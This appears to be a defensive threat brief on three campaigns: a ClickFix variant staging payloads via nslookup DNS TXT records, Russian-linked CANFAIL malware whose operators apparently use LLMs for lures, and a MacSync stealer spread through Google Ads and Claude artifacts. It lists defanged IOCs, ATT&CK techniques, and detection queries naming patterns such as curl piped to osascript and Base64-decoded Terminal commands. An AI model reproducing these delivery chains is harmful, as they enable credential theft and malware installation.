Threat Brief - 2026-02-15
Threat Brief — Saturday, February 15, 2026
Executive Summary
Microsoft disclosed a new ClickFix variant using nslookup for DNS-based payload staging—delivers ModeloRAT and Lumma Stealer while evading web request monitoring. Russian-linked CANFAIL malware targeting Ukrainian defense with LLM-assisted reconnaissance. macOS users hit by MacSync stealer distributed through Google Ads and Claude artifacts.
1. DNS-Based ClickFix Attack (ModeloRAT/Lumma Stealer)
🔴 Critical · Social Engineering + Malware Delivery · No CVE · Active Campaigns
Microsoft disclosed new ClickFix variant using nslookup against external DNS servers to retrieve payloads from TXT records. Bypasses web request monitoring by blending into DNS traffic. Delivers ModeloRAT (Python RAT) and Lumma Stealer via CastleLoader.
Sources: The Hacker News · Microsoft
TTPs
| Technique | Tactic | Observable |
|---|---|---|
| T1204.002 | Execution | User runs command via Windows Run dialog |
| T1059.001 | Execution | cmd.exe → nslookup with hardcoded external DNS server |
| T1071.004 | C2 | DNS queries to attacker-controlled nameservers |
| T1059.006 | Execution | Python-based ModeloRAT execution |
| T1547.001 | Persistence | LNK file in Windows Startup folder |
IOCs
azwsappdev[.]com— Payload hosting (ZIP archive)- Hardcoded external DNS servers (not system resolver)
- VBScript launching ModeloRAT
Detection
Log Sources: Sysmon (ProcessCreate, NetworkConnect), DNS logs, PowerShell logs
Logic:
# Nslookup to non-standard DNS server
index=sysmon EventCode=1 Image="*nslookup.exe"
| regex CommandLine="nslookup.*\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"
| where NOT match(CommandLine, "(8\.8\.8\.8|8\.8\.4\.4|1\.1\.1\.1)")
# CMD spawning nslookup then PowerShell
index=sysmon EventCode=1
| transaction ParentProcessId maxspan=30s
| search Image="*cmd.exe*" Image="*nslookup.exe*" Image="*powershell.exe*"Existing Coverage:
- Nslookup PowerShell Download Cradle (Sigma) ✅
- Nslookup PowerShell Download Cradle - ProcessCreation (Sigma) ✅
- DNS Exfiltration Using Nslookup App (Splunk ESCU) ✅
- Cisco Secure Firewall - Lumma Stealer Activity (Splunk ESCU) ✅
Action
🔴 Hunt for nslookup with external DNS. Microsoft detects as Trojan:Win32/ClickFix.R!ml. Look for LNK files in Startup folders pointing to VBScript.
2. CANFAIL Malware Targeting Ukraine
🟡 High · Espionage · No CVE · Russian-Linked APT
Google GTIG attributes CANFAIL malware to suspected Russian intelligence. Targeting Ukrainian defense, energy, government. Actor uses LLMs for reconnaissance and lure generation. Phishing impersonates Ukrainian energy orgs.
Sources: The Hacker News · Google Cloud Blog
TTPs
| Technique | Tactic | Observable |
|---|---|---|
| T1566.002 | Initial Access | Google Drive links in phishing emails |
| T1059.007 | Execution | Obfuscated JavaScript (.pdf.js) |
| T1059.001 | Execution | PowerShell dropper → memory-only execution |
| T1204.001 | Execution | User executes RAR archive content |
| T1102 | C2 | WebSocket-based trojan communication |
IOCs
- RAR archives via Google Drive links
- JavaScript files with double extension (*.pdf.js)
- Fake Ukrainian energy company domains
- LLM-generated phishing lures
Detection
Log Sources: Email gateway, Sysmon, PowerShell logs
Logic:
# RAR extraction followed by JS execution
index=sysmon EventCode=1
| transaction ParentProcessId maxspan=60s
| search (Image="*WinRAR*" OR Image="*7z*") Image="*wscript*"
# Memory-only PowerShell (no -File parameter)
index=sysmon EventCode=1 Image="*powershell.exe"
| where NOT match(CommandLine, "-File")
| where match(CommandLine, "-e|EncodedCommand|FromBase64")Existing Coverage:
- Suspicious PowerShell Download (Sigma) ✅
- Obfuscated PowerShell OneLiner Execution (Sigma) ✅
Action
🟡 Hunt if in-scope. Relevant for orgs supporting Ukraine or in defense/energy sectors. Look for Google Drive links in phishing leading to RAR→JS→PowerShell chains.
3. macOS MacSync Stealer via Claude/Google Ads
🟡 High · Info Stealer · No CVE · ClickFix Social Engineering
Campaign abuses Google Ads and Anthropic Claude artifacts to deliver MacSync stealer. 15,000+ users exposed. Uses ClickFix technique to trick users into running Terminal commands. Targets keychain, browser data, crypto wallets.
Sources: CyberPress · Moonlock Lab
TTPs
| Technique | Tactic | Observable |
|---|---|---|
| T1583.008 | Resource Dev | Malvertising via Google Ads |
| T1204.002 | Execution | User pastes Base64 command into Terminal |
| T1059.002 | Execution | osascript piped command execution |
| T1555 | Cred Access | Keychain credential theft |
| T1041 | Exfiltration | HTTP POST with chunked uploads |
IOCs
a2abotnet[.]com/dynamic— C2 servera2abotnet[.]com/gate— Data exfil endpointraxelpak[.]com— Payload hostingapple-mac-disk-space.medium[.]com— Fake Apple article/tmp/osalogging.zip— Staging file
Detection
Log Sources: macOS Unified Logs, EDR, network traffic
Logic:
# Curl piped to osascript
process where process.name == "osascript" and process.parent.name == "curl"
# Base64 decode in Terminal context
process where process.name == "base64" and process.args : "-d"
and process.parent.name in ("Terminal", "bash", "zsh")
# Network to known C2
dns.query.name : ("a2abotnet.com", "raxelpak.com")Existing Coverage:
- JXA In-memory Execution Via OSAScript (Sigma) ✅
- Clipboard Data Collection Via OSAScript (Sigma) ✅
- MacOS AMOS Stealer - VM Check Activity (Splunk ESCU) ✅
Action
🟡 Block IOCs at perimeter. Add a2abotnet[.]com and raxelpak[.]com to blocklists. Educate users about fake “DNS resolver” or “disk analyzer” prompts.
Priority Actions
- 🔴 ClickFix DNS staging — Hunt for
nslookupto external DNS servers followed by PowerShell - 🟡 macOS MacSync — Block
a2abotnet[.]comandraxelpak[.]com; educate users on Terminal paste attacks - 🟡 Ukraine-supporting orgs — Hunt for CANFAIL indicators if in defense/energy sectors